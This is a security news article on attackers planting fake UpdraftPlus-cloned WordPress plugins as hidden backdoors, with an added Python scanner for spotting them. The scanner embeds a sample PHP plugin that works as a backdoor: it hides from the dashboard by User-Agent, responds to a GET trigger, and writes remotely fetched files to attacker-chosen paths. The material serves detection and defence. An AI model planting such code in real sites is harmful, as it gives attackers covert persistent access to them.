21 October 2019

Hackers use fake UpdraftPlus plugins to backdoor WordPress websites

Attackers are planting fake WordPress plugins that hide in plain sight and act as backdoors: they use them to compromise sites, keep access to them, and upload web shells and scripts for brute-forcing other sites. Researchers at Sucuri have spotted several such plugins (with names like initiatorseo or updrat123) that copy the structure of the popular backup/restore plugin UpdraftPlus, which has more than 2 million active installations and is regularly updated by its contributors.

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” the researchers said.

The malicious plugins hide themselves from the WordPress dashboard: they are only listed for visitors whose browser sends a specific User-Agent string, and that string varies from plugin to plugin. Such plugins are easy to produce, either with ready-made automated tools or by inserting a malicious payload such as a web shell into the source code of a legitimate plugin.

According to Sucuri, a fake plugin will also reveal itself when the attackers add a specific GET parameter to a request, such as initiationactivity or testingkey. The main purpose of these plugins is to serve as a backdoor through which the attackers upload web shells into various root directories of the compromised site; the shells carry a script for brute-forcing other websites, which tests lists of username/password pairs against targeted WordPress sites.

To upload arbitrary files onto a compromised site, the attackers send POST requests that specify a remote URL from which the file is downloaded, along with the path and name of the file to be created on the compromised server. The names of these POST parameters are unique to each analysed plugin, the researchers found.
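The three behaviours described above (cloned UpdraftPlus metadata, User-Agent gated visibility, a GET-parameter trigger, and a POST-driven remote download to a chosen local path) can be turned into a simple file-system scan for a wp-content/plugins tree. The following is an added example written for this page, not Sucuri's tooling or any code from the campaign. Its indicators are heuristics assumed from the article; the `all_plugins` filter hook, the User-Agent value `SecretUA/1.0` and the POST parameter names `src_url`/`dst_path` are assumptions (the article says the real parameter names differ per plugin), and the sample plugin tree is constructed in a temporary directory.

```python
"""Heuristic scanner for fake/backdoored WordPress plugins.

Added example, not Sucuri's tooling. Indicators are assumptions derived from
the article; the `all_plugins` hook is the usual way a plugin drops itself
from the dashboard list but is not named by the page.
"""
import re
import tempfile
from pathlib import Path

# WordPress reads "Key: value" lines from the first comment block of the main file.
HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Plugin URI|Version)\s*:\s*(.+?)\s*$", re.M)

INDICATORS = {
    # plugin list is filtered depending on the visitor's browser User-Agent
    "ua_gated_visibility": [r"HTTP_USER_AGENT", r"all_plugins"],
    # a specific query-string parameter makes the backdoor answer
    "get_trigger": [r"\$_GET\s*\[\s*['\"][A-Za-z0-9_]+['\"]\s*\]"],
    # POST parameters name a remote URL and a local path; the plugin fetches and writes
    "post_remote_write": [r"\$_POST", r"(file_get_contents|curl_init)\s*\(",
                          r"(file_put_contents|fwrite|copy)\s*\("],
}


def parse_header(src: str) -> dict:
    """Return the plugin header fields found in a PHP file's first comment block."""
    m = re.search(r"/\*.*?\*/", src, re.S)
    return dict(HEADER_RE.findall(m.group(0))) if m else {}


def scan_file(path: Path) -> dict:
    src = path.read_text(errors="replace")
    hits = [name for name, pats in INDICATORS.items()
            if all(re.search(p, src) for p in pats)]
    return {"file": str(path), "header": parse_header(src), "indicators": hits}


def scan_plugins_dir(plugins_dir: Path) -> list:
    """Walk wp-content/plugins; report files with backdoor indicators or a borrowed identity."""
    findings = []
    for php in sorted(plugins_dir.rglob("*.php")):
        r = scan_file(php)
        slug = php.relative_to(plugins_dir).parts[0]
        name = r["header"].get("Plugin Name", "").lower()
        # The fakes copy UpdraftPlus metadata verbatim but live under another slug.
        if "updraftplus" in name and slug != "updraftplus":
            r["indicators"].append("cloned_updraftplus_header")
        if r["indicators"]:
            findings.append({"slug": slug, "file": php.name, "indicators": r["indicators"]})
    return findings


# Constructed sample plugins (not real malware); parameter names are assumptions.
FAKE_PLUGIN = r'''<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Plugin URI: https://updraftplus.com
Version: 1.16.16
*/
// Hidden from the plugin list unless the browser sends the attacker's User-Agent.
add_filter('all_plugins', function ($plugins) {
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'SecretUA/1.0') === false) {
        unset($plugins[plugin_basename(__FILE__)]);
    }
    return $plugins;
});
if (isset($_GET['testingkey'])) { echo 'ok'; }
if (isset($_POST['src_url'], $_POST['dst_path'])) {
    file_put_contents($_POST['dst_path'], file_get_contents($_POST['src_url']));
}
'''
REAL_PLUGIN = r'''<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Plugin URI: https://updraftplus.com
Version: 1.16.16
*/
// placeholder body standing in for the genuine plugin
'''


def build_sample_tree() -> Path:
    """Create a temporary wp-content/plugins tree with one genuine-looking and one fake plugin."""
    root = Path(tempfile.mkdtemp()) / "wp-content" / "plugins"
    (root / "updraftplus").mkdir(parents=True)
    (root / "updraftplus" / "updraftplus.php").write_text(REAL_PLUGIN)
    (root / "updrat123").mkdir()
    (root / "updrat123" / "updrat123.php").write_text(FAKE_PLUGIN)
    return root


if __name__ == "__main__":
    for finding in scan_plugins_dir(build_sample_tree()):
        print(finding)
```

Run against a real install with `scan_plugins_dir(Path("/var/www/html/wp-content/plugins"))`. The header check is the cheapest signal: a directory whose main file claims to be UpdraftPlus but is not named updraftplus is worth a look regardless of the code heuristics, which legitimate plugins can occasionally trip (file uploaders use `$_POST` and `file_put_contents` too), so treat hits as leads for manual review rather than verdicts.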

“While none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough. Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” the researchers concluded. They also added that compromised websites may be leveraged as a platform to launch attacks invisible from outside, such as DDoS and brute-force attacks, spam or cryptomining operations.
